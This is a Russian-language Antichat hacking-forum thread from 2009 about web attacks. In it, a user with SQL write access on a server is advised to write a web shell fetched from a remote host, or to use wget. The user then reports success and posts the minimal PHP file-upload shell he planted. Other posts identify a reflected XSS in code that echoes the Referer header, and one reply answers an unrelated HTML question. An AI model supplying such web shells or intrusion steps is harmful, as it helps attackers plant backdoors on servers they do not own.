ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

05.02.2009, 17:36
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
c0m, ты пойми, что с помощью SQL ты PHP-код не выполнишь никак... Только можешь записать его в файл с поомщью INTO OUTFILE, но если у тебя нету прав на это (в 99% случаев их нет), то ничего ты не сделаешь в плане внедрения в файловую систему.
|
|
|

05.02.2009, 17:42
|
|
Новичок
Регистрация: 21.01.2009
Сообщений: 1
Провел на форуме: 4093
Репутация:
0
|
|
Народ подскажите если в файле php на сервере содержится нижеследующий код это является уязвимостью? Если да то что необходимо переслать в referer чтобы выполнить произвольный код.
PHP код:
<?
$referer=$_SERVER['HTTP_REFERER'];
echo"$referer";
?>
|
|
|

05.02.2009, 17:52
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме: 5321514
Репутация:
3313
|
|
Сообщение от Ink-developer
Народ подскажите если в файле php на сервере содержится нижеследующий код это является уязвимостью? Если да то что необходимо переслать в referer чтобы выполнить произвольный код.
PHP код:
<?
$referer=$_SERVER['HTTP_REFERER'];
echo"$referer";
?>
в вышеследующем коде нет ничего, кроме XSS
|
|
|

05.02.2009, 17:46
|
|
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме: 191945
Репутация:
7
|
|
Сообщение от groundhog
c0m, ты пойми, что с помощью SQL ты PHP-код не выполнишь никак... Только можешь записать его в файл с поомщью INTO OUTFILE, но если у тебя нету прав на это (в 99% случаев их нет), то ничего ты не сделаешь в плане внедрения в файловую систему.
есть права на запись через sql
Последний раз редактировалось c0m; 05.02.2009 в 17:52..
|
|
|

05.02.2009, 17:49
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
Сообщение от c0m
права на запись через sql
Ну так найди диру куда можешь писать и запиши в файл инклуд какого-нибудь веб-шелла с удалённого хоста. Это во-первых, во-вторых попробуй wget
|
|
|

05.02.2009, 18:15
|
|
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме: 191945
Репутация:
7
|
|
Сообщение от groundhog
Ну так найди диру куда можешь писать и запиши в файл инклуд какого-нибудь веб-шелла с удалённого хоста. Это во-первых, во-вторых попробуй wget
залил )
PHP код:
<form enctype=multipart/form-data method=post> <input name=userfile type=file> <input type=submit name=go></form> <?php if(isset($_POST[go]))move_uploaded_file($_FILES[userfile][tmp_name],$_FILES[userfile][name]); ?>
з.ы. через инклуд не получалось
Спасибо
|
|
|

05.02.2009, 17:47
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
да, это уязвимость, попробуй: <h1>Все на кур!</h1>
|
|
|

05.02.2009, 17:57
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
ты никак не выполнишь PHP-код... Блин, ну черти! Ну поймите - PHP код выполняется на стороне сервера, в вашем же случае только клиентская сторона может быть уязвима. И вообще с такими вопросам марш в "Уязвимости".
|
|
|

05.02.2009, 18:41
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
Вопрос:
Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
|
|
|

05.02.2009, 18:46
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от geforce
Вопрос:
Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
Код:
<img src=site.ru/img.jpg></img>
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|